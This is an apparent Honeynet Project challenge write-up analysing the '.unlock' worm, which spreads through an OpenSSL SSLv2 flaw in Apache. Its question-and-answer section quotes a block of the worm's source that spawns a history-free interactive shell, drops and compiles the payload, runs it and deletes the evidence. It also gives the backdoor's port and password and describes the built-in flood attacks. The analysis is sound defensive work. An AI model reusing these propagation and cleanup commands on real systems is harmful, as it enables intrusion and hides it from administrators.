Honeynet Project

Scan 25

Writeup by Joe Lofshult <jlofshult@cox.net>


Process

  1. Downloaded the file, .unlock, from http://honeynet.project.org/scans/scan25/.unlock.

  2. Verified that the file matched the one posted by computing the MD5 checksum of .unlock:
    $ md5sum .unlock
    a03b5be9264651ab30f2223592befb42 .unlock

  3. Determined that .unlock was a gzipped file by using the file command.
    $ file .unlock
    .unlock: gzip compressed data, deflated, last modified: Fri Sep 20 05:59:04 2002, os: Unix

  4. Unzipped the file .unlock

    First tried
    $ gunzip -S "" .unlock
    gunzip: .unlock: cannot decompress onto itself

    Then tried:
    $ mv .unlock .unlock.gz
    $ gunzip .unlock.gz
    $ file .unlock
    .unlock: GNU tar archive

    Untarred the file .unlock
    $ tar xvf .unlock
    .unlock.c
    .update.c

  5. Analyzed the downloaded file and the extracted source files, .unlock.c and .update.c, to answer the questions.



Questions and Answers


  1. Which is the type of the .unlock file? When was it generated?

    The file is a gzipped tar archive file. Based on the output of the file command it appears the .unlock file was created on 9/20/02 at 05:59:04.
    $file .unlock
    .unlock: gzip compressed data, deflated, last modified: Fri Sep 20 05:59:04 2002, os: Unix

  2. Based on the source code, who is the author of this worm? When was it created? Is it compatible with the date from question 1?

    Based on the source code, the author of .unlock.c is contem@efnet with "some modification done by aion (aion@ukr.net)". The latter also takes credit for the .update.c file - "code by aion (aion@ukr.net) ".

    The last modification dates on the two source files are:
    .unlock.c Sep 20 08:28
    .update.c Sep 19 16:57

    The date on the .update.c file is consistent with the gzipped file, but the .unlock.c file appears to be newer than the archive. One possible explanation for this is that the source code was written on one system and then copied to another before being gzipped, and the clocks on the two systems were out of sync.

  3. Which process name is used by the worm when it is running?

    When the worm runs it disguises itself by appearing to be a web server process, httpd.
    #define PSNAME "httpd "
    ...
    strcpy(argv[0],PSNAME);

    The worm also compiles itself so that its binary file will have the name httpd, although it will be in /tmp.
    gcc -o /tmp/httpd /tmp/.unlock.c -lcrypto

  4. In which format does the worm copy itself to a newly infected machine? Which files are created in the whole process? After the worm executes itself, which files remain on the infected machine?

    The worm copies itself as a uuencoded copy of a gzipped tar file, with the name /tmp/.unlock.uu. The program then uudecodes the file producing /tmp/.unlock. It extracts the contents of the archive to /tmp, which are .unlock.c and .update.c, and compiles them to /tmp/httpd and /tmp/update, respectively. After the worm starts a copy of itself on the target machine it attempts to remove the evidence of its existence by deleting /tmp/.unlock.uu, /tmp/.unlock.c, /tmp/.update.c, /tmp/httpd, and /tmp/update.

    writem(sockfd,"export TERM=xterm;export HOME=/tmp;export HISTFILE=/dev/null;"
                "export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin;"
                "exec bash -i\n");
  writem(sockfd,"rm -rf /tmp/.unlock.uu /tmp/.unlock.c /tmp/.update.c "
                "       /tmp/httpd /tmp/update /tmp/.unlock; \n");
  writem(sockfd,"cat > /tmp/.unlock.uu << __eof__; \n");
  zhdr(1);
  encode(sockfd);
  zhdr(0);
  writem(sockfd,"__eof__\n");
  writem(sockfd,"uudecode -o /tmp/.unlock /tmp/.unlock.uu;   "
                "tar xzf /tmp/.unlock -C /tmp/;              "
                "gcc -o /tmp/httpd  /tmp/.unlock.c -lcrypto; "
                "gcc -o /tmp/update /tmp/.update.c;\n");
  sprintf(rcv,  "/tmp/httpd %s; /tmp/update; \n",localip);
  writem(sockfd,rcv); sleep(3);
  writem(sockfd,"rm -rf /tmp/.unlock.uu /tmp/.unlock.c /tmp/.update.c "
                "       /tmp/httpd /tmp/update; exit; \n");

  5. Which port is scanned by the worm?

    The worm scans port 80 for vulnerable versions of the Apache web server on specific Linux distributions. It connects on port 80 and sends the request "GET / HTTP/1.1\r\n\r\n" which is illegal since HTTP/1.1 requires a Host header. The web server returns a 400 error and reveals information used by the worm to determine if the server is vulnerable.

  6. Which vulnerability does the worm try to exploit? In which architectures?

    The worm tries to exploit an error in OpenSSL, documented in CERT Vulnerability 102795 and CERT Advisory 2002-23. The architectures it attempts to exploit are listed in the following table, as taken from the .unlock.c source code:

    Linux Distribution

    Apache Version

    Gentoo


    Debian

    1.3.26

    Red-Hat

    1.3.06, 1.3.09, 1.3.12, 1.3.19, 1.3.20, 1.3.26, 1.3.23, 1.3.22

    SuSE

    1.3.12, 1.3.17, 1.3.19, 1.3.20, 1.3.23

    Mandrake

    1.3.14, 1.3.19, 1.3.20, 1.3.23

    Slackware

    1.3.26

  7. What kind of information is sent by the worm by email? To which account?

    Mail is sent to the e-mail address aion@ukr.net via mailserver freemail.ukr.net. The "mail from:" address used is test@microsoft.com. The information sent is the hostid and hostname of the newly infected host, and the IP address of the system from which the worm came (the infecting system).

  8. Which port (and protocol) is used by the worm to communicate to other infected machines?

    The worm communicates with other machines infected with this worm using UDP messages on port 4156.

  9. Name 3 functionalities are built in the worm to attack other networks?

    Beside the obvious ability to spread itself via the SSL v2 vulnerability, the worm also has the ability to launch attacks against other networks either by itself, or more likely, as part of a DDOS attack. The DOS attacks built in are:
    1) UDP Flood (line 2205: case 0x29: { // Udp flood )
    2) TCP Flood (line 2246: case 0x2A: { // Tcp flood )
    3) IPv6 Flood (line 2279: case 0x2B: { // IPv6 Tcp flood )
    4) DNS Flood (line 2308: case 0x2C: { // Dns flood )

  10. What is the purpose of the .update.c program? Which port does it use?

    Creates a backdoor for remote access which listens for connections on TCP port 1052. By default the backdoor grants shell access as the user that was running the Apache web server. A password of “aion1981” is required to gain shell access.

  11. Bonus question: What is the purpose of the SLEEPTIME and UPTIME values in the .update.c program?

    To make the backdoor more difficult to detect since it only listens for connections for UPTIME seconds every SLEEPTIME seconds. Since the source sets these two values to 10 and 300, respectively, it means that the backdoor is listening for connections on port 1052 for only 10 seconds every 5 minutes.